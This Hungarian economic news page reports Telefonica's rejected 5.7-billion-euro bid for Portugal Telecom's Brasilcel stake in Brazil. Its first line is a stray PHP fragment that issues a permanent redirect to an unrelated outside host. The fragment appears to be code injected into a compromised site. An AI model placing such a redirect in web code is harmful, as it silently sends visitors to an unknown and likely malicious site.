header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> A mobilpiac jövője Dél-Amerikában van?
hétfő, május 27, 2019

Keresés

A mobilpiac jövője Dél-Amerikában van?

Európa második legnagyobb telekom cége, a Telefonica SA vételi ajánlatot a Portugal Telecom brazíliai részesdésre. A hírre jelentősen, 8.4%-kal erősödött a Portugal Telekom árfolyama. Európa második legnagyobb telekom cége, a Telefonica SA vételi ajánlatot tett a Portugal Telecom 50%-os Brasilcel részesedésére. A Telefonica már 50%-os tulajdonosa a brazil mobilszolgáltatónak, így a tranzakció után egyedüli tulajdonosává válna a brazil cégnek, és ezzel megszerezné a Vivo Participacoes SA 60%-os részesedését is. Az ajánlat 5.7 millárd euró, ez körülbelül 140%-kal magasabb, mint a piaci kapitalizáció. A Portugal Telekom igazgatótanácsa azonban egyhangúlag elutasított az ajánlatot, hiszen a brazil piac lényeges elemét képezi stratégiájuknak.
A harc lényegében a Dél-Amerika vezető mobilszolgáltató pozíciójárt folyik. Az előfizetők száma a brazil piacon az elmúlt évben 11%-kal nőtt. A Telefonica ajánlata az új stratégiáját is tükrözi: a lassuló növekedésű európai piacok helyett a figyelmet inkább Latin-Amerikára fordítja. A Telefonica egyébként már több mint 50 milliárd dollárt költött az 1990-es évek óta Dél-Amerikában.
A hírre elkezdett szárnyalni a Portugal Telecom árfolyama, már közel 8.4%-ot erősödött. A spanyol mobilszolgáltató papírjai viszont 8%-ot gyengültek az ajánlat bejelentése után.

Portfolio.hu online gazdasági újság

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia